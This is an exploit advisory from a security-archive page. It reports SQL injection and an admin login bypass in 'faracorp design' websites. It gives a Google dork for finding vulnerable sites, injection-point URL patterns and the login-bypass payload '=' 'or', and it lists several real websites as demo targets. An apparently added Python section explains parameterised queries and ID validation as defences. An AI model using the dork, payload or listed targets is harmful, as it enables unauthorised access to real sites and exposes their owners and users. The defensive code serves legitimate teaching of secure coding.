faracorp design SQL injection Vulnerability

Published: 2016.11.19
Credit: Iranonymous
Risk: Medium
CWE: N/A
CVE: N/A
Local: No
Remote: Yes
Dork: intext:"طراحی وب سایت و اجرا: پورتال هوشمند"

##########################
# Exploit Title: faracorp design Sql injection Vulnerability
# Google Dork : intext:"طراحی وب سایت و اجرا: پورتال هوشمند"
# Date:2016-11-19
# Discovered By: Ormazd
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Version: all
# Tested on : Win 10
##########################
## DP ##
We found multiple security problems in faracorp design:
1- SQL injection in page course_view.php
2- Admin page bypass
####

PoC 1:

http://www.Site.com/path/product/[inject here]/.html
or
http://www.Site.com/path/news/view/[inject here]/.html
or
http://www.Site.com/path/news/[inject here]/.html

...

Demo:
http://www.dsteel.ir/products/4/.html
http://www.doudmanco.com/portal/news/view/5/.html
http://www.vese.ir/news/63/.html
####

PoC 2:

http://site.com/admin

# Username : '=' 'or'

# Password : '=' 'or'

Demo:
http://www.dsteel.ir/admin/login.php
http://www.vese.ir/admin/login.php
http://www.alborzmachineco.com/admin/login.php
#############################
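Both PoCs above come down to user-controlled strings being concatenated into SQL: a path segment that should be a numeric id (PoC 1) and login fields (PoC 2). The following is an added example, not code from faracorp design or from the advisory author; it uses Python and an in-memory SQLite table as a stand-in for the site's PHP/MySQL stack, and the users/products schema, the PBKDF2 password storage and all sample rows are constructed assumptions. It shows the concatenated query shape that makes the login injectable, beside the hardened form: strict id validation for the route segment and parameterised queries plus a constant-time hash check for the login, so the quote-bearing payload from PoC 2 is handled as plain data and never authenticates.

```python
import hashlib
import hmac
import os
import re
import sqlite3

# Constructed demo credentials (hypothetical, not from the advisory).
DEMO_USER = "admin"
DEMO_PASSWORD = "correct horse"


def parse_resource_id(segment: str) -> int:
    """Validate the id segment of routes like /product/<id>/.html.

    Only a short run of decimal digits is accepted; anything else (quotes,
    spaces, SQL keywords) is rejected before it can reach a query.
    """
    if not re.fullmatch(r"[0-9]{1,10}", segment):
        raise ValueError("resource id must be a decimal integer")
    return int(segment)


def build_unsafe_query(username: str, password: str) -> str:
    """The concatenation pattern that makes a login form injectable.

    Returned only as a string for contrast; it is never executed here.
    With a quote in either field the user input becomes part of the SQL
    grammar instead of staying inside the string literal.
    """
    return ("SELECT id FROM users WHERE username='" + username
            + "' AND password='" + password + "'")


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256 (assumed storage scheme for the demo)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def make_demo_db() -> sqlite3.Connection:
    """In-memory schema with one constructed account and one product row."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE,"
        " salt BLOB, pw_hash BLOB)"
    )
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    salt = os.urandom(16)
    conn.execute(
        "INSERT INTO users (username, salt, pw_hash) VALUES (?, ?, ?)",
        (DEMO_USER, salt, hash_password(DEMO_PASSWORD, salt)),
    )
    conn.execute("INSERT INTO products (id, name) VALUES (?, ?)", (4, "demo product 4"))
    conn.commit()
    return conn


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Hardened login: parameterised lookup, then constant-time hash compare.

    The submitted strings are bound as values, so they can never change the
    statement; a payload such as '=' 'or' is simply a username that does not
    exist. Returns the user id on success, None otherwise.
    """
    row = conn.execute(
        "SELECT id, salt, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return None
    user_id, salt, stored = row
    if not hmac.compare_digest(hash_password(password, salt), stored):
        return None
    return user_id


def fetch_product_safe(conn: sqlite3.Connection, segment: str):
    """Hardened route handler for /product/<id>/.html: validate, then bind."""
    pid = parse_resource_id(segment)
    row = conn.execute("SELECT name FROM products WHERE id = ?", (pid,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_demo_db()
    print(build_unsafe_query("'=' 'or'", "'=' 'or'"))
    print("payload login ->", login_safe(db, "'=' 'or'", "'=' 'or'"))
    print("valid login   ->", login_safe(db, DEMO_USER, DEMO_PASSWORD))
    print("product 4     ->", fetch_product_safe(db, "4"))
```

The first print shows the PoC 2 strings landing inside the concatenated statement as `username=''=' 'or''`, i.e. as SQL tokens rather than a value; the hardened functions never build SQL from input at all, and the id validator rejects the `[inject here]` position of PoC 1 unless it is purely numeric, so a web application firewall rule or access-log check for non-digit characters in that segment is a cheap complementary detection.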

#Thanks to : MR.Khatar ||Turk-Khan || Blackwolf_Iran ||ll_azab-siyah_ll ||Sh@d0w ||Hellish_PN ||

And All Of Iranian Anonymous .

# Discovered By: Ormazd

Copyright 2017, cxsecurity.com